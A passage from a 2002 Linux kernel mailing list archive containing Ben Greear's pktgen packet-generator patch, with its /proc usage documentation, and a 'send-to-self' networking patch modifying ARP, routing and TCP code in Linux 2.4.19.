pktgen_threads = pg_thread; + + /* Start the thread running */ + start_pktgen_kthread(pg_thread); + + return 0; +}/* pg_add_thread_info */ + + +/* interface_info must be stopped and on the pg_thread stopped list + */ +static int pg_rem_interface_info(struct 
pktgen_thread_info* pg_thread, + struct pktgen_interface_info* info) { + if (info->do_run_run) { + printk("WARNING: trying to remove a running interface, stopping it now.\n"); + pg_stop_interface(pg_thread, info); + } + + /* Disassociate from the interface */ + check_remove_device(info); + + /* Clean up proc file system */ + if (strlen(info->fname)) { + remove_proc_entry(info->fname, NULL); + } + + pg_lock(pg_thread, __FUNCTION__); + { + /* Remove from the stopped list */ + struct pktgen_interface_info* p = pg_thread->stopped_if_infos; + if (p == info) { + pg_thread->stopped_if_infos = p->next; + p->next = NULL; + } + else { + while (p) { + if (p->next == info) { + p->next = p->next->next; + info->next = NULL; + break; + } + p = p->next; + } + } + + info->pg_thread = NULL; + } + pg_unlock(pg_thread, __FUNCTION__); + + return 0; +}/* pg_rem_interface_info */ + + +static int __init pg_init(void) { + int i; printk(version); + + /* Initialize our global variables */ + for (i = 0; iread_proc = proc_pg_read; - pg_proc_ent->write_proc = proc_pg_write; - pg_proc_ent->data = 0; - - pg_busy_proc_ent = create_proc_entry("net/pg_busy", 0, 0); - if (!pg_busy_proc_ent) { - printk("pktgen: Error: cannot create net/pg_busy procfs entry.\n"); - remove_proc_entry("net/pg", NULL); - return -ENOMEM; - } - pg_busy_proc_ent->read_proc = proc_pg_busy_read; - pg_busy_proc_ent->data = 0; - return 0; -} + create_proc_dir(); + + sprintf(module_fname, "net/%s/pgctrl", PG_PROC_DIR); + module_proc_ent = create_proc_entry(module_fname, 0600, 0); + if (!module_proc_ent) { + printk("pktgen: Error: cannot create %s procfs entry.\n", module_fname); + return -EINVAL; + } + module_proc_ent->read_proc = proc_pg_ctrl_read; + module_proc_ent->write_proc = proc_pg_ctrl_write; + module_proc_ent->proc_fops = &(pktgen_fops); /* IOCTL hook */ + module_proc_ent->data = NULL; + + /* Register us to receive netdevice events */ + register_netdevice_notifier(&pktgen_notifier_block); + + /* Register handler */ + 
handle_pktgen_hook = pktgen_receive; + + for (i = 0; i"); MODULE_DESCRIPTION("Packet Generator tool"); MODULE_LICENSE("GPL"); -MODULE_PARM(pg_count, "i"); -MODULE_PARM(pg_ipg, "i"); -MODULE_PARM(pg_cpu_speed, "i"); -MODULE_PARM(pg_multiskb, "i"); +MODULE_PARM(pg_count_d, "i"); +MODULE_PARM(pg_ipg_d, "i"); +MODULE_PARM(pg_thread_count, "i"); +MODULE_PARM(pg_multiskb_d, "i"); +MODULE_PARM(debug, "i"); --- linux-2.4.19/net/core/pktgen.h Wed Dec 31 17:00:00 1969 +++ linux-2.4.19.dev/net/core/pktgen.h Mon Sep 16 23:53:55 2002 @@ -0,0 +1,240 @@ +/* -*-linux-c-*- + * $Id: pg_2.4.19.patch,v 1.5 2002/09/17 07:01:55 greear Exp $ + * pktgen.c: Packet Generator for performance evaluation. + * + * See pktgen.c for details of changes, etc. +*/ + + +#ifndef PKTGEN_H_INCLUDE_KERNEL__ +#define PKTGEN_H_INCLUDE_KERNEL__ + + +/* The buckets are exponential in 'width' */ +#define LAT_BUCKETS_MAX 32 + +#define IP_NAME_SZ 32 + +/* Keep information per interface */ +struct pktgen_interface_info { + char ifname[32]; + + /* Parameters */ + + /* If min != max, then we will either do a linear iteration, or + * we will do a random selection from within the range. 
+ */ + __u32 flags; + +#define F_IPSRC_RND (1<<0) /* IP-Src Random */ +#define F_IPDST_RND (1<<1) /* IP-Dst Random */ +#define F_UDPSRC_RND (1<<2) /* UDP-Src Random */ +#define F_UDPDST_RND (1<<3) /* UDP-Dst Random */ +#define F_MACSRC_RND (1<<4) /* MAC-Src Random */ +#define F_MACDST_RND (1<<5) /* MAC-Dst Random */ +#define F_SET_SRCMAC (1<<6) /* Specify-Src-Mac + (default is to use Interface's MAC Addr) */ +#define F_SET_SRCIP (1<<7) /* Specify-Src-IP + (default is to use Interface's IP Addr) */ +#define F_TXSIZE_RND (1<<8) /* Transmit size is random */ + + int min_pkt_size; /* = ETH_ZLEN; */ + int max_pkt_size; /* = ETH_ZLEN; */ + int nfrags; + __u32 ipg; /* Default Interpacket gap in nsec */ + __u64 count; /* Default No packets to send */ + __u64 sofar; /* How many pkts we've sent so far */ + __u64 tx_bytes; /* How many bytes we've transmitted */ + __u64 errors; /* Errors when trying to transmit, pkts will be re-sent */ + + /* runtime counters relating to multiskb */ + __u64 next_tx_ns; /* timestamp of when to tx next, in nano-seconds */ + + __u64 fp; + __u32 fp_tmp; + int last_ok; /* Was last skb sent? + * Or a failed transmit of some sort? This will keep + * sequence numbers in order, for example. + */ + /* Fields relating to receiving pkts */ + __u32 last_seq_rcvd; + __u64 ooo_rcvd; /* out-of-order packets received */ + __u64 pkts_rcvd; /* packets received */ + __u64 dup_rcvd; /* duplicate packets received */ + __u64 bytes_rcvd; /* total bytes received, as obtained from the skb */ + __u64 seq_gap_rcvd; /* how many gaps we received. This correlates to + * dropped pkts, except perhaps in cases where we also + * have re-ordered pkts. In that case, you have to tie-break + * by looking at send v/s received pkt totals for the interfaces + * involved. + */ + __u64 non_pg_pkts_rcvd; /* Count how many non-pktgen skb's we are sent to check. 
*/ + __u64 dup_since_incr; /* How many duplicates since the last seq number increment, + * used to detect gaps when multiskb > 1 + */ + int avg_latency; /* in micro-seconds */ + int min_latency; + int max_latency; + __u64 latency_bkts[LAT_BUCKETS_MAX]; + __u64 pkts_rcvd_since_clear; /* with regard to clearing/resetting the latency logic */ + + __u64 started_at; /* micro-seconds */ + __u64 stopped_at; /* micro-seconds */ + __u64 idle_acc; + __u32 seq_num; + + int multiskb; /* Use multiple SKBs during packet gen. If this number + * is greater than 1, then that many copies of the same + * packet will be sent before a new packet is allocated. + * For instance, if you want to send 1024 identical packets + * before creating a new packet, set multiskb to 1024. + */ + int peer_multiskb; /* Helps detect drops when multiskb > 1 on peer */ + int do_run_run; /* if this changes to false, the test will stop */ + + char dst_min[IP_NAME_SZ]; /* IP, e.g. 1.2.3.4 */ + char dst_max[IP_NAME_SZ]; /* IP, e.g. 1.2.3.4 */ + char src_min[IP_NAME_SZ]; /* IP, e.g. 1.2.3.4 */ + char src_max[IP_NAME_SZ]; /* IP, e.g. 1.2.3.4 */ + + /* If we're doing ranges, random or incremental, then this + * defines the min/max for those ranges. 
+ */ + __u32 saddr_min; /* inclusive, source IP address */ + __u32 saddr_max; /* exclusive, source IP address */ + __u32 daddr_min; /* inclusive, dest IP address */ + __u32 daddr_max; /* exclusive, dest IP address */ + + __u16 udp_src_min; /* inclusive, source UDP port */ + __u16 udp_src_max; /* exclusive, source UDP port */ + __u16 udp_dst_min; /* inclusive, dest UDP port */ + __u16 udp_dst_max; /* exclusive, dest UDP port */ + + __u32 src_mac_count; /* How many MACs to iterate through */ + __u32 dst_mac_count; /* How many MACs to iterate through */ + + unsigned char dst_mac[6]; + unsigned char src_mac[6]; + + __u32 cur_dst_mac_offset; + __u32 cur_src_mac_offset; + __u32 cur_saddr; + __u32 cur_daddr; + __u16 cur_udp_dst; + __u16 cur_udp_src; + __u32 cur_pkt_size; + + __u8 hh[14]; + /* = { + 0x00, 0x80, 0xC8, 0x79, 0xB3, 0xCB, + + We fill in SRC address later + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x08, 0x00 + }; + */ + __u16 pad; /* pad out the hh struct to an even 16 bytes */ + char result[512]; + /* proc file names */ + char fname[80]; + + /* End of stuff that user-space should care about */ + + struct sk_buff* skb; /* skb we are to transmit next, mainly used for when we + * are transmitting the same one multiple times + */ + struct pktgen_thread_info* pg_thread; /* the owner */ + + struct pktgen_interface_info* next_hash; /* Used for chaining in the hash buckets */ + struct pktgen_interface_info* next; /* Used for chaining in the thread's run-queue */ + + + + struct net_device* odev; /* The out-going device. Note that the device should + * have its pg_info pointer pointing back to this + * device. This will be set when the user specifies + * the out-going device name (not when the inject is + * started as it used to do.) + */ + + struct proc_dir_entry *proc_ent; + + int (*rcv) (struct sk_buff *skb); +}; /* pktgen_interface_info */ + + +struct pktgen_hdr { + __u32 pgh_magic; + __u32 seq_num; + struct timeval timestamp; +}; + + +/* Define some IOCTLs. 
Just picking random numbers, basically. */ +#define GET_PKTGEN_INTERFACE_INFO 0x7450 + +struct pktgen_ioctl_info { + char thread_name[32]; + char interface_name[32]; + struct pktgen_interface_info info; +}; + + +struct pktgen_thread_info { + struct pktgen_interface_info* running_if_infos; /* list of running interfaces, current will + * not be in this list. + */ + struct pktgen_interface_info* stopped_if_infos; /* list of stopped interfaces. */ + struct pktgen_interface_info* cur_if; /* Current (running) interface we are servicing in + * the main thread loop. + */ + + struct pktgen_thread_info* next; + char name[32]; + char fname[128]; /* name of proc file */ + struct proc_dir_entry *proc_ent; + char result[512]; + u32 max_before_softirq; /* We'll call do_softirq to prevent starvation. */ + + spinlock_t pg_threadlock; + + /* Linux task structure of thread */ + struct task_struct *thread; + + /* Task queue needed to launch thread */ + struct tq_struct tq; + + /* function to be started as thread */ + void (*function) (struct pktgen_thread_info *kthread); + + /* semaphore needed on start and creation of thread. */ + struct semaphore startstop_sem; + + /* public data */ + + /* queue thread is waiting on. Gets initialized by + init_kthread, can be used by thread itself. + */ + wait_queue_head_t queue; + + /* flag to tell thread whether to die or not. + When the thread receives a signal, it must check + the value of terminate and call exit_kthread and terminate + if set. + */ + int terminate; + + int in_use; /* if 0, then we can delete or re-use this struct */ + + /* additional data to pass to kernel thread */ + void *arg; +};/* struct pktgen_thread_info */ + +/* Defined in dev.c */ +extern int (*handle_pktgen_hook)(struct sk_buff *skb); + +/* Returns < 0 if the skb is not a pktgen buffer. 
*/ +int pktgen_receive(struct sk_buff* skb); + + +#endif --- linux-2.4.19/net/netsyms.c Fri Aug 2 17:39:46 2002 +++ linux-2.4.19.dev/net/netsyms.c Sat Sep 14 21:55:39 2002 @@ -90,6 +90,14 @@ extern int sysctl_max_syn_backlog; #endif +#ifdef CONFIG_NET_PKTGEN_MODULE +#warning "EXPORT_SYMBOL(handle_pktgen_hook);"; +extern int (*handle_pktgen_hook)(struct sk_buff *skb); +/* Would be OK to export as EXPORT_SYMBOL_GPL, but can't get that to work for + * some reason. --Ben */ +EXPORT_SYMBOL(handle_pktgen_hook); +#endif + /* Skbuff symbols. */ EXPORT_SYMBOL(skb_over_panic); EXPORT_SYMBOL(skb_under_panic); @@ -416,6 +424,9 @@ EXPORT_SYMBOL(netlink_kernel_create); EXPORT_SYMBOL(netlink_dump_start); EXPORT_SYMBOL(netlink_ack); +EXPORT_SYMBOL(netlink_set_nonroot); +EXPORT_SYMBOL(netlink_register_notifier); +EXPORT_SYMBOL(netlink_unregister_notifier); #if defined(CONFIG_NETLINK_DEV) || defined(CONFIG_NETLINK_DEV_MODULE) EXPORT_SYMBOL(netlink_attach); EXPORT_SYMBOL(netlink_detach); @@ -490,6 +501,7 @@ EXPORT_SYMBOL(skb_clone); EXPORT_SYMBOL(skb_copy); EXPORT_SYMBOL(netif_rx); +EXPORT_SYMBOL(netif_receive_skb); EXPORT_SYMBOL(dev_add_pack); EXPORT_SYMBOL(dev_remove_pack); EXPORT_SYMBOL(dev_get); @@ -588,4 +600,9 @@ EXPORT_SYMBOL(net_call_rx_atomic); EXPORT_SYMBOL(softnet_data); +#if defined(CONFIG_NET_RADIO) || defined(CONFIG_NET_PCMCIA_RADIO) +#include +EXPORT_SYMBOL(wireless_send_event); +#endif /* CONFIG_NET_RADIO || CONFIG_NET_PCMCIA_RADIO */ + #endif /* CONFIG_NET */ --- linux-2.4.19/Documentation/networking/pktgen.txt Fri Aug 2 17:39:42 2002 +++ linux-2.4.19.dev/Documentation/networking/pktgen.txt Sat Sep 14 21:42:29 2002 @@ -1,50 +1,118 @@ How to use the Linux packet generator module. -1. Enable CONFIG_NET_PKTGEN to compile and build pktgen.o, install it - in the place where insmod may find it. -2. Cut script "ipg" (see below). -3. Edit script to set preferred device and destination IP address. -4. Run in shell: ". ipg" -5. After this two commands are defined: - A. 
"pg" to start generator and to get results. - B. "pgset" to change generator parameters. F.e. - pgset "multiskb 1" use multiple SKBs for packet generation - pgset "multiskb 0" use single SKB for all transmits - pgset "pkt_size 9014" sets packet size to 9014 - pgset "frags 5" packet will consist of 5 fragments - pgset "count 200000" sets number of packets to send - pgset "ipg 5000" sets artificial gap inserted between packets - to 5000 nanoseconds - pgset "dst 10.0.0.1" sets IP destination address - (BEWARE! This generator is very aggressive!) - pgset "dstmac 00:00:00:00:00:00" sets MAC destination address - pgset stop aborts injection +1. Enable CONFIG_NET_PKTGEN to compile and build pktgen.o, install it + in the place where insmod may find it. +2. Add an interface to the kpktgend_0 thread: + echo "add_interface eth1" > /proc/net/pktgen/kpktgend_0 +2a. Add more interfaces as needed. +3. Configure interfaces by setting values as defined below. The + general strategy is: echo "command" > /proc/net/pktgen/[device] + For example: echo "multiskb 100" > /proc/net/pktgen/eth1 + + "multiskb 100" Will send 100 identical pkts before creating + new packet with new timestamp, etc. + "multiskb 0" Will create new skb for all transmits. + "peer_multiskb 100" Helps us determine dropped & dup pkts, sender's multiskb. + "min_pkt_size 60" sets packet minimum size to 60 (64 counting CRC) + "max_pkt_size 1514" sets packet size to 1514 (1518 counting CRC) + "frags 5" packet will consist of 5 fragments + "count 200000" sets number of packets to send, set to zero + for continious sends untill explicitly + stopped. + "ipg 5000" sets artificial gap inserted between packets + to 5000 nanoseconds + "dst 10.0.0.1" sets IP destination address + (BEWARE! This generator is very aggressive!) + "dst_min 10.0.0.1" Same as dst + "dst_max 10.0.0.254" Set the maximum destination IP. + "src_min 10.0.0.1" Set the minimum (or only) source IP. + "src_max 10.0.0.254" Set the maximum source IP. 
+ "dst_mac 00:00:00:00:00:00" sets MAC destination address + "src_mac 00:00:00:00:00:00" sets MAC source address + "src_mac_count 1" Sets the number of MACs we'll range through. The + 'minimum' MAC is what you set with src_mac. + "dst_mac_count 1" Sets the number of MACs we'll range through. The + 'minimum' MAC is what you set with dst_mac. + "flag [name]" Set a flag to determine behaviour. Prepend '!' to the + flag to turn it off. Current flags are: + IPSRC_RND #IP Source is random (between min/max), + IPDST_RND, UDPSRC_RND, TXSIZE_RND, + UDPDST_RND, MACSRC_RND, MACDST_RND + "udp_src_min 9" set UDP source port min. If < udp_src_max, then + cycle through the port range. + "udp_src_max 9" set UDP source port max. + "udp_dst_min 9" set UDP destination port min. If < udp_dst_max, then + cycle through the port range. + "udp_dst_max 9" set UDP destination port max. + "stop" Stops this interface from transmitting. It will still + receive packets and record their latency, etc. + "start" Starts the interface transmitting packets. + "clear_counters" Clear the packet and latency counters. + +You can start and stop threads by echoing commands to the /proc/net/pktgen/pgctrl +file. Supported commands are: + "stop kpktgend_0" Stop thread 0. + "start threadXX" Start (create) thread XX. You may wish to create one thread + per CPU. - Also, ^C aborts generator. ----- cut here +You can manage the interfaces on a thread by echoing commands to +the /proc/net/pktgen/[thread] file. Supported commands are: + "add_interface eth1" Add interface eth1 to the chosen thread. + "rem_interface eth1" Remove interface eth1 from the chosen thread. + "max_before_softirq" Maximum loops before we cause a call to do_softirq; + this is to help mitigate starvation on the RX side. 
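The echo commands listed above can be strung together into a small script. What follows is only a sketch and not part of the patch: the names PG_ROOT, pgset and pg_setup_eth1 are made up for illustration (this pgset takes a file name as its first argument, unlike the helper in the old documentation), eth1 and kpktgend_0 are borrowed from the examples above, and the parameter values are arbitrary.

```shell
#!/bin/sh
# Sketch only. PG_ROOT, pgset and pg_setup_eth1 are illustrative names,
# not something the patch provides. PG_ROOT may be pointed at a scratch
# directory for a dry run.
PG_ROOT=${PG_ROOT:-/proc/net/pktgen}

# Write one command string to a thread or interface file under $PG_ROOT.
#   $1 = file name (kpktgend_0, eth1, pgctrl, ...)
#   $2 = command, e.g. "count 200000"
pgset() {
    echo "$2" > "$PG_ROOT/$1"
}

# Attach eth1 to thread kpktgend_0, configure it, and start sending.
# The chain stops at the first write that fails. Values are arbitrary.
pg_setup_eth1() {
    pgset kpktgend_0 "add_interface eth1" &&
    pgset eth1 "count 200000" &&
    pgset eth1 "min_pkt_size 60" &&
    pgset eth1 "max_pkt_size 60" &&
    pgset eth1 "dst 10.0.0.1" &&
    pgset eth1 "dst_mac 00:00:00:00:00:00" &&
    pgset eth1 "start"
}
```

Nothing runs until pg_setup_eth1 is called. With the module loaded, it would presumably be run as root, after which reading the interface's proc file shows the counters and a Result: line for the last command written.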
+ + +You can examine various counters and parameters by reading the appropriate +proc file: + +[root@localhost lanforge]# cat /proc/net/pktgen/kpktgend_0 +VERSION-1 +Name: kpktgend_0 +Current: eth2 +Running: eth6 +Stopped: eth1 eth5 +Result: NA + + +[root@localhost lanforge]# cat /proc/net/pktgen/eth2 +VERSION-1 +Params: count 0 pkt_size: 300 frags: 0 ipg: 0 multiskb: 0 ifname "eth2" + dst_min: 172.2.1.1 dst_max: 172.2.1.6 src_min: 172.1.1.4 src_max: 172.1.1.8 + src_mac: 00:00:00:00:00:00 dst_mac: 00:00:00:00:00:00 + udp_src_min: 99 udp_src_max: 1005 udp_dst_min: 9 udp_dst_max: 9 + src_mac_count: 0 dst_mac_count: 0 + Flags: IPSRC_RND IPDST_RND UDPSRC_RND +Current: + pkts-sofar: 158835950 errors: 0 + started: 1026024703542360us elapsed: 4756326418us + idle: 1723232054307ns next_tx: 27997154666566(-3202934)ns + seq_num: 158835951 cur_dst_mac_offset: 0 cur_src_mac_offset: 0 + cur_saddr: 0x60101ac cur_daddr: 0x30102ac cur_udp_dst: 9 cur_udp_src: 966 + pkts_rcvd: 476002 bytes_rcvd: 159929440 last_seq_rcvd: 476002 ooo_rcvd: 0 + dup_rcvd: 0 seq_gap_rcvd(dropped): 0 non_pg_rcvd: 0 + avg_latency: 41us min_latency: 40us max_latency: 347us pkts_in_sample: 476002 + Buckets(us) [ 0 0 0 0 0 0 311968 164008 23 3 0 0 0 0 0 0 0 0 0 0 ] +Result: OK: ipg=0 + +[root@localhost lanforge]# cat /proc/net/pktgen/eth6 +VERSION-1 +Params: count 0 pkt_size: 300 frags: 0 ipg: 11062341 multiskb: 0 ifname "eth6" + dst_min: 90 dst_max: 90 src_min: 90 src_max: 90 + src_mac: 00:00:00:00:00:00 dst_mac: 00:00:00:00:00:00 + udp_src_min: 9 udp_src_max: 9 udp_dst_min: 9 udp_dst_max: 9 + src_mac_count: 0 dst_mac_count: 0 + Flags: +Current: + pkts-sofar: 479940 errors: 0 + started: 1026024703542707us elapsed: 4795667656us + idle: 109585100905ns next_tx: 28042807786397(-79364)ns + seq_num: 479941 cur_dst_mac_offset: 0 cur_src_mac_offset: 0 + cur_saddr: 0x0 cur_daddr: 0x0 cur_udp_dst: 9 cur_udp_src: 9 + pkts_rcvd: 160323509 bytes_rcvd: 50392479910 last_seq_rcvd: 160323509 ooo_rcvd: 0 + dup_rcvd: 0 
seq_gap_rcvd(dropped): 0 non_pg_rcvd: 0
+    avg_latency: 230us min_latency: 36us max_latency: 1837us pkts_in_sample: 160323509
+    Buckets(us) [ 0 0 0 0 0 0 287725 2618755 54130607 98979415 80358 4226649 0 0 0 0 0 0 0 0 ]
+Result: OK: ipg=11062341
-#! /bin/sh
-
-modprobe pktgen.o
-
-function pgset() {
-    local result
-
-    echo $1 > /proc/net/pg
-
-    result=`cat /proc/net/pg | fgrep "Result: OK:"`
-    if [ "$result" = "" ]; then
-         cat /proc/net/pg | fgrep Result:
-    fi
-}
-
-function pg() {
-    echo inject > /proc/net/pg
-    cat /proc/net/pg
-}
-
-pgset "odev eth0"
-pgset "dst 0.0.0.0"
-
----- cut here
--------------030304010606000406080300--

From greearb@candelatech.com Tue Sep 17 23:42:22 2002
Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 23:42:28 -0700 (PDT)
Received: from grok.yi.org (IDENT:+TvYAwGncdywiZyqnLILNQjsVzNMyxm4@dhcp101-dsl-usw4.w-link.net [208.161.125.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I6gLtG010503 for ; Tue, 17 Sep 2002 23:42:21 -0700
Received: from candelatech.com (IDENT:8NMxHMDbgRGAkU6EvJ1bmjg0SaQXMx9V@localhost.localdomain [127.0.0.1]) by grok.yi.org (8.11.6/8.11.2) with ESMTP id g8I6lMv22590; Tue, 17 Sep 2002 23:47:22 -0700
Message-ID: <3D88217A.6070702@candelatech.com>
Date: Tue, 17 Sep 2002 23:47:22 -0700
From: Ben Greear
Organization: Candela Technologies
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: "'netdev@oss.sgi.com'" , linux-kernel
Subject: [PATCH] Networking: send-to-self
Content-Type: multipart/mixed; boundary="------------010703030901020509080500"
X-archive-position: 251
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: greearb@candelatech.com
Precedence: bulk
X-list: netdev

This is a multi-part message in MIME format.
--------------010703030901020509080500
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

This patch allows one to use the SO_BINDTODEVICE and a new ioctl against
net_device objects to send and receive regular routed traffic between two
interfaces on the same machine.

It also fixes a problem when using BINDTODEVICE: the old code does not set
the bound_if correctly when sending back the syn-ack during TCP connection
initialization.

I'm not sure how useful others will find it, but it amuses me ;)

Comments and suggestions welcome.

Thanks,
Ben

--
Ben Greear
President of Candela Technologies Inc http://www.candelatech.com
ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear

--------------010703030901020509080500
Content-Type: text/plain; name="sts_2.4.19.patch"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline; filename="sts_2.4.19.patch"

--- linux-2.4.19/include/linux/sockios.h Wed Nov 7 15:39:36 2001
+++ linux-2.4.19.dev/include/linux/sockios.h Sun Sep 15 21:10:00 2002
@@ -114,6 +114,16 @@
 #define SIOCBONDINFOQUERY 0x8994 /* rtn info about bond state */
 #define SIOCBONDCHANGEACTIVE 0x8995 /* update to a new active slave */
 
+
+/* Ben's little hack land */
+#define SIOCSACCEPTLOCALADDRS 0x89a0 /* Allow interfaces to accept pkts from
+                                      * local interfaces...use with SO_BINDTODEVICE
+                                      */
+#define SIOCGACCEPTLOCALADDRS 0x89a1 /* Allow interfaces to accept pkts from
+                                      * local interfaces...use with SO_BINDTODEVICE
+                                      */
+
+
 /* Device private ioctl calls */
 
 /*
--- linux-2.4.19/net/Config.in Fri Aug 2 17:39:46 2002
+++ linux-2.4.19.dev/net/Config.in Sun Sep 15 21:27:08 2002
@@ -97,6 +97,7 @@
 mainmenu_option next_comment
 comment 'Network testing'
 tristate 'Packet Generator (USE WITH CAUTION)' CONFIG_NET_PKTGEN
+bool 'Send-to-Self' CONFIG_NET_SENDTOSELF
 endmenu
 
 endmenu
--- linux-2.4.19/include/net/tcp.h Fri Aug 2 17:39:46 2002
+++ linux-2.4.19.dev/include/net/tcp.h Sun Sep 15 21:57:07 2002
@@ -27,6 +27,7 @@
 #include
 #include
 #include
+#include
 #include
 #include
 
@@ -117,8 +118,7 @@
      * Now align to a new cache line as all the following members
      * are often dirty.
      */
-    rwlock_t __tcp_lhash_lock
-        __attribute__((__aligned__(SMP_CACHE_BYTES)));
+    rwlock_t __tcp_lhash_lock ____cacheline_aligned;
     atomic_t __tcp_lhash_users;
     wait_queue_head_t __tcp_lhash_wait;
     spinlock_t __tcp_portalloc_lock;
@@ -447,7 +447,6 @@
 extern int sysctl_tcp_retrans_collapse;
 extern int sysctl_tcp_stdurg;
 extern int sysctl_tcp_rfc1337;
-extern int sysctl_tcp_tw_recycle;
 extern int sysctl_tcp_abort_on_overflow;
 extern int sysctl_tcp_max_orphans;
 extern int sysctl_tcp_max_tw_buckets;
@@ -520,6 +519,14 @@
         struct tcp_v6_open_req v6_req;
 #endif
     } af;
+#ifdef CONFIG_NET_SENDTOSELF
+    int bound_dev_if; /* This is so we can connect to ourselves and not collide
+                       * in the open-request hash (the addresses and ports are the
+                       * same, but we need two ends, so use the interface to determine
+                       * one from the other. Active when SO_BINDTODEVICE is used.
+                       * --Ben
+                       */
+#endif
 };
 
 /* SLAB cache for open requests. */
--- linux-2.4.19/net/ipv4/arp.c Fri Aug 2 17:39:46 2002
+++ linux-2.4.19.dev/net/ipv4/arp.c Sun Sep 15 21:14:43 2002
@@ -1,4 +1,4 @@
-/* linux/net/inet/arp.c
+/* linux/net/inet/arp.c -*-linux-c-*-
  *
  * Version: $Id: sts_2.4.19.patch,v 1.3 2002/09/17 07:01:55 greear Exp $
  *
@@ -351,12 +351,26 @@
     int flag = 0;
     /*unsigned long now; */
 
-    if (ip_route_output(&rt, sip, tip, 0, 0) < 0)
+    if (ip_route_output(&rt, sip, tip, 0, 0) < 0)
         return 1;
-    if (rt->u.dst.dev != dev) {
-        NET_INC_STATS_BH(ArpFilter);
-        flag = 1;
-    }
+
+    if (rt->u.dst.dev != dev) {
+#ifdef CONFIG_NET_SENDTOSELF
+        if ((dev->priv_flags & IFF_ACCEPT_LOCAL_ADDRS) &&
+            (rt->u.dst.dev == &loopback_dev)) {
+            /* OK, we'll let this special case slide, so that we can arp from one
+             * local interface to another. This seems to work, but could use some
+             * review.
--Ben
+             */
+        }
+        else {
+#endif
+            NET_INC_STATS_BH(ArpFilter);
+            flag = 1;
+#ifdef CONFIG_NET_SENDTOSELF
+        }
+#endif
+    }
     ip_rt_put(rt);
     return flag;
 }
--- linux-2.4.19/net/ipv4/fib_frontend.c Fri Aug 2 17:39:46 2002
+++ linux-2.4.19.dev/net/ipv4/fib_frontend.c Sun Sep 15 21:16:44 2002
@@ -233,8 +233,19 @@
 
     if (fib_lookup(&key, &res))
         goto last_resort;
-    if (res.type != RTN_UNICAST)
-        goto e_inval_res;
+
+    if (res.type != RTN_UNICAST) {
+#ifdef CONFIG_NET_SENDTOSELF
+        if ((res.type == RTN_LOCAL) &&
+            (dev->priv_flags & IFF_ACCEPT_LOCAL_ADDRS)) {
+            /* All is OK */
+        }
+        else
+#endif
+            goto e_inval_res;
+
+    }
+
     *spec_dst = FIB_RES_PREFSRC(res);
     fib_combine_itag(itag, &res);
 #ifdef CONFIG_IP_ROUTE_MULTIPATH
--- linux-2.4.19/net/ipv4/ip_output.c Fri Aug 2 17:39:46 2002
+++ linux-2.4.19.dev/net/ipv4/ip_output.c Sun Sep 15 21:19:45 2002
@@ -520,8 +520,18 @@
         /*
          * Get the memory we require with some space left for alignment.
          */
-
-        skb = sock_alloc_send_skb(sk, fraglen+hh_len+15, flags&MSG_DONTWAIT, &err);
+        if (!(flags & MSG_DONTWAIT) || nfrags == 0) {
+            skb = sock_alloc_send_skb(sk, fraglen + hh_len + 15,
+                                      (flags & MSG_DONTWAIT), &err);
+        } else {
+            /* On a non-blocking write, we check for send buffer
+             * usage on the first fragment only.
+             */
+            skb = sock_wmalloc(sk, fraglen + hh_len + 15, 1,
+                               sk->allocation);
+            if (!skb)
+                err = -ENOBUFS;
+        }
         if (skb == NULL)
             goto error;
 
@@ -965,7 +975,11 @@
         daddr = replyopts.opt.faddr;
     }
 
+#ifdef CONFIG_NET_SENDTOSELF
+    if (ip_route_output(&rt, daddr, rt->rt_spec_dst, RT_TOS(skb->nh.iph->tos), sk->bound_dev_if))
+#else
     if (ip_route_output(&rt, daddr, rt->rt_spec_dst, RT_TOS(skb->nh.iph->tos), 0))
+#endif
         return;
 
     /* And let IP do all the hard work.
--- linux-2.4.19/net/ipv4/tcp_ipv4.c Fri Aug 2 17:39:46 2002
+++ linux-2.4.19.dev/net/ipv4/tcp_ipv4.c Sun Sep 15 21:25:42 2002
@@ -865,21 +865,36 @@
     return h&(TCP_SYNQ_HSIZE-1);
 }
 
+/** Netdevice ID can be wild-carded by making it zero.
+ */
 static struct open_request *tcp_v4_search_req(struct tcp_opt *tp,
                                               struct open_request ***prevp,
                                               __u16 rport,
-                                              __u32 raddr, __u32 laddr)
+                                              __u32 raddr, __u32 laddr,
+                                              int netdevice_id)
 {
     struct tcp_listen_opt *lopt = tp->listen_opt;
     struct open_request *req, **prev;
 
+    /* Will only take netdevice_id into the equation if neither are
+     * 0. This should be backwards compatible with older code, and also
+     * let us connect to ourselves over external ports. Otherwise, we
+     * get confused about which connection is the originator v/s the
+     * receiver of the open request. --Ben
+     */
     for (prev = &lopt->syn_table[tcp_v4_synq_hash(raddr, rport)];
          (req = *prev) != NULL;
          prev = &req->dl_next) {
         if (req->rmt_port == rport &&
             req->af.v4_req.rmt_addr == raddr &&
             req->af.v4_req.loc_addr == laddr &&
-            TCP_INET_FAMILY(req->class->family)) {
+            TCP_INET_FAMILY(req->class->family)
+#ifdef CONFIG_NET_SENDTOSELF
+            && ((!netdevice_id) || (!req->bound_dev_if) ||
+                (req->bound_dev_if == netdevice_id))) {
+#else
+            ) {
+#endif
             BUG_TRAP(req->sk == NULL);
             *prevp = prev;
             return req;
@@ -899,7 +914,10 @@
     req->retrans = 0;
     req->sk = NULL;
     req->dl_next = lopt->syn_table[h];
-
+#ifdef CONFIG_NET_SENDTOSELF
+    req->bound_dev_if = sk->bound_dev_if;
+#endif
+
     write_lock(&tp->syn_wait_lock);
     lopt->syn_table[h] = req;
     write_unlock(&tp->syn_wait_lock);
@@ -979,7 +997,8 @@
     struct sock *sk;
     __u32 seq;
     int err;
-
+    int netdevice_id = 0;
+
     if (skb->len < (iph->ihl << 2) + 8) {
         ICMP_INC_STATS_BH(IcmpInErrors);
         return;
@@ -1048,9 +1067,13 @@
         if (sk->lock.users != 0)
             goto out;
 
+        if (skb->dev) {
+            netdevice_id = skb->dev->ifindex;
+        }
+
         req = tcp_v4_search_req(tp, &prev,
                                 th->dest,
